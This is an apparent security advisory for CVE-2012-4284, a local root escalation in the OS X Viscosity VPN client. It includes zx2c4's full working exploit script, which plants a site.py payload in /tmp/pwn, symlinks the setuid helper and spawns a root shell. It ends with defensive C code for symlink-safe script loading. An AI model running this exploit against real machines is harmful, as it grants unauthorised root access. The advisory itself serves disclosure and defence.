OS X Viscosity OpenVPN Client Local Privilege Escalation Vulnerability
Posted: 2014-12-08 13:33:20
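CVE-ID: CVE-2012-4284
Published: 2012-08-12
Updated: 2012-08-12
Affected systems:
Viscosity Viscosity
Details:
Viscosity is an OpenVPN client for Mac and Windows. Viscosity contains a privilege escalation vulnerability in its implementation: the setuid ViscosityHelper binary executes arbitrary scripts insecurely. A local attacker can exploit this through a symlink attack to gain elevated privileges.
Source:
Jason A. Donenfeld
References:
http://osvdb.org/show/osvdb/84709
Test method: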
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

#!/bin/sh
#
##########################
#        Viscatory       #
#                        #
#          zx2c4         #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savvy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh

echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf /tmp/pwn")
print "[+] Getting root."
os.setuid(0)
os.setgid(0)
os.execl("/bin/bash", "bash")
_EOF
echo "[+] Making symlink."
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
echo "[+] Running vulnerable SUID helper."
exec /tmp/pwn/root
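Solution:
Vendor patch:
Viscosity
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.thesparklabs.com/viscosity/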
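
As an added example (not part of the original advisory and not Viscosity's code): C code showing how a setuid helper can defend against the symlink attack described above, assuming the helper locates its script relative to the path it was invoked by. The names `resource_dir`, `script_is_trusted` and `demo`, and the temporary directory layout, are constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <libgen.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example with hypothetical names; not Viscosity's code. Returns the real
   binary's directory: symlinks in invoked_path are resolved before dirname(). */
int resource_dir(const char *invoked_path, char *out, size_t outlen) {
    char real[PATH_MAX];
    if (realpath(invoked_path, real) == NULL) return -1;
    const char *dir = dirname(real);
    if (strlen(dir) >= outlen) return -1;
    strcpy(out, dir);
    return 0;
}

/* Accept a script only if it is a regular file (lstat, so never a symlink), owned
   by trusted_uid (0 for a setuid-root helper) and not group- or world-writable. */
int script_is_trusted(const char *path, uid_t trusted_uid) {
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != trusted_uid) return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Constructed layout mirroring the script above: app/helper is the installed binary,
   drop/ holds a symlink to it and a site.py. Returns one bit per passed check. */
int demo(void) {
    char base[] = "/tmp/vhdemoXXXXXX", dir[PATH_MAX];
    int r = 0;
    if (!mkdtemp(base) || chdir(base) || mkdir("app", 0755) || mkdir("drop", 0755) ||
        close(creat("app/helper", 0755)) || close(creat("drop/site.py", 0644)) ||
        symlink("../app/helper", "drop/root")) return -1;
    if (resource_dir("drop/root", dir, sizeof dir) == 0 &&
        strcmp(dir + strlen(dir) - 4, "/app") == 0) r |= 1;   /* resolved to app/ */
    if (!script_is_trusted("drop/root", getuid())) r |= 2;    /* symlink rejected */
    chmod("drop/site.py", 0666);
    if (!script_is_trusted("drop/site.py", getuid())) r |= 4; /* writable rejected */
    chmod("drop/site.py", 0644);
    if (script_is_trusted("drop/site.py", getuid())) r |= 8;  /* safe file accepted */
    unlink("drop/root"); unlink("drop/site.py"); unlink("app/helper");
    rmdir("drop"); rmdir("app");
    if (chdir("/") == 0) rmdir(base);
    return r;
}
int main(void) { return demo() == 15 ? 0 : 1; }
```

The demo passes the current user's uid as the trusted owner so it can run unprivileged; a setuid-root helper would pass 0, and would apply the same ownership check to the directory that contains the script.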